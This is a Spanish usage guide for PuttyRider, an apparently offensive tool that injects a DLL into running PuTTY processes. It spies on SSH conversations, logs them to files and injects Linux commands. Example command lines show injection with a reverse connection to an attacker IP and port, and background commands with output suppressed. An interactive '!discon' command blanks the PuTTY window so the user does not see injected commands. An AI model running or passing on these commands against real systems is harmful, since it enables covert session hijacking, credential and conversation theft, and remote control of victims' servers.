
Secuestrar sesiones de Putty para espiar la conversación e inyectar comandos de Linux.
Secuestrar sesiones de Putty para espiar la conversación e inyectar comandos de Linux.
Listar los procesos Putty existentes y su estado (inyectado / no inyectado)
PuttyRider.exe -l
Inyectar DLL en el primer putty.exe encontrado e iniciar una conexión inversa desde la DLL a mi IP:Puerto, luego salir de PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
Ejecutar en segundo plano y esperar nuevos procesos Putty. Inyectar en cualquier putty.exe nuevo y escribir todas las conversaciones en archivos locales.
PuttyRider.exe -w -f
Expulsar PuttyRider.dll de todos los procesos Putty donde ya esté inyectada. (No olvides matar PuttyRider.exe si se está ejecutando en modo -w, de lo contrario se reinyectará de nuevo.)
PuttyRider.exe -x
Modos de operación:
-l Listar los procesos Putty en ejecución y sus conexiones
-w Inyectar en todas las sesiones Putty existentes y esperar nuevas sesiones
para inyectar también en ellas
-p PID Inyectar solo en la sesión Putty existente identificada por PID.
Si PID==0, inyectar en el primer Putty encontrado
-x Limpiar. Eliminar la DLL de todas las instancias Putty en ejecución
-d Modo depuración. Solo funciona con el modo -p
-c CMD Ejecutar automáticamente un comando de Linux tras una inyección exitosa
PuttyRider eliminará los espacios finales y el carácter '&' de CMD
PuttyRider agregará: " 1>/dev/null 2>/dev/null &" a CMD
-h Mostrar esta ayuda
Modos de salida:
-f Escribir toda la conversación Putty en un archivo en el directorio local.
El nombre del archivo tendrá el PID del putty.exe actual añadido
-r IP:PORT Iniciar una conexión inversa hacia la máquina especificada y
comenzar una sesión interactiva.
Comandos interactivos (tras recibir una conexión inversa):
!status Ver si la ventana Putty está conectada a la entrada del usuario
!discon Desconectar la ventana principal de Putty para que no muestre nada
Esto es útil para enviar comandos sin que el usuario lo note
!recon Reconectar la ventana Putty a su modo de operación normal
CMD Comandos de shell de Linux
!exit Terminar esta conexión
!help Mostrar ayuda para la conexión del cliente
Usa el Símbolo del sistema de Visual Studio:
nmake main dll
Gracias a Brett Moore de Insomnia Security por su prueba de concepto PuttyHijack